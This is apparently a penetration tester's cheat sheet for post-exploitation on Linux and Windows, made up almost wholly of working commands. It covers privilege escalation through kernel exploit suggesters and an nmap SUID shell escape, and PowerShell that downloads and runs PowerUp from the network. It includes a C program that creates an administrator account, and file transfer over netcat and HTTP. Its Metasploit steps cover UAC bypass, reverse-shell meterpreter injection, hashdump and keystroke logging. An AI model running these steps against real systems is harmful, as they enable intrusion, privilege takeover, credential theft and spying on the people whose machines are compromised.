Post Exploitation

Linux Privilege Escalation

# Kernel Exploits
wget --no-check-certificate https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl

# Common Linux Exploits
# Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition
https://www.exploit-db.com/exploits/40839

# Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice'
https://www.exploit-db.com/exploits/5093

# Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1
https://www.exploit-db.com/exploits/8572

# Misconfigurations
wget --no-check-certificate https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
bash LinEnum.sh

# SUID Bit
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
nmap –interactive
!sh

Windows Privilege Escalation

# Misconfigurations
Powershell -ExecutionPolicy bypass
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")
Invoke-AllChecks -HTMLReport

# Kernel Exploits
systeminfo > systeminfo.txt
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2014-06-06-mssb.xlsx -i systeminfo.txt

Verify

# ICACLS
icacls.exe  "C:\Program Files (x86)\Photodex\ProShow Producer\ScsiAccess.exe"

Exploit

# include <stdlib.h>
int main () {
    system ("net user test 123456789 /add");
    system ("net localgroup administrators test /add");
    return 0;
}

Compile

apt-get install gcc-mingw-w64-i686
i686-w64-mingw32-gcc main.c -o main.exe

File Transfer

Wget

# Kali
python -m SimpleHTTPServer

# Target
wget 192.168.114:8000/file.txt

Netcat

# Target
nc -nlvp 4444 > wget

# Kali
nc -nv 192.168.1.4 4444 < /usr/bin/wget

Powershell

# Kali
python -m SimpleHTTPServer

# Target
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.114:8000/file.txt', 'C:\users\test\file.txt')"

Interactive Shell

# Python shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Background the session
(CTRL+ Z)

# Add keyboard shortcuts
stty raw -echo

# Foreground the session
fg

# Add clear the screen ability
export TERM=xterm

Metasploit Post Exploitation

# Searching for exploits
search type:post platform:linux
search type:post platform:windows

# Examples
use post/multi/gather/ping_sweep
show options
set session 1
set rhosts 192.168.1.1-192.168.1.110
run

use post/multi/recon/local_exploit_suggester
set session 1
run

use exploit/windows/local/bypassuac_eventvwr
set session 1
run

# For Windwos
use post/windows/manage/payload_inject
set handler true
set lhost 192.168.1.114
set lport 4444
set payload windows/meterpreter/reverse_tcp
set session 1
run

# For Linux
use multi/manage/shell_to_meterpreter

Meterpreter

# Official Reference
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

# Migrate to another process
getpid
migrate 1544

# Download and Upload Files
# remember in meterpreter use slash like linux "/"
download c:/users/test/dir1/test.txt /root/test.txt
upload /root/test.txt c:/users/test/Desktop/test.txt

# Search For Files
search -h
search -f test.txt
search -f *.txt
search -d c:/users/test -f *.txt

# Network Commands
arp | ifconfig | netstat | route
portfwd add -L 192.168.1.107 -l 6666 -r 192.168.1.109 -p 7777 #Forward
portfwd add -R -L 192.168.1.107 -l 4444 -r 192.168.1.109 -p 5555 #Reverse

# Powerful Commands
getsystem
hashdump
screenshot -p /root/screen1.jpeg

# Record Keystroke
migrate {Explorer_PID}
keyscan_start -v
keyscan_dump
keyscan_stop